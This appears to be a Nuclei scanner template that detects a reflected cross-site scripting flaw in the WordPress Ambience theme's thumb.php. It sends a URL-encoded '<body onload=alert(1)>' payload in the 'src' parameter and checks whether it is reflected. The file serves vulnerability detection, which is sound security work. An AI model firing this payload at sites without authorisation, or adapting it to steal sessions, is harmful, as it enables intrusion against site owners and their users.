id: wp-ambience-xss

info:
  name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
  reference: https://www.exploit-db.com/exploits/38568
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<body onload=alert(1)>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
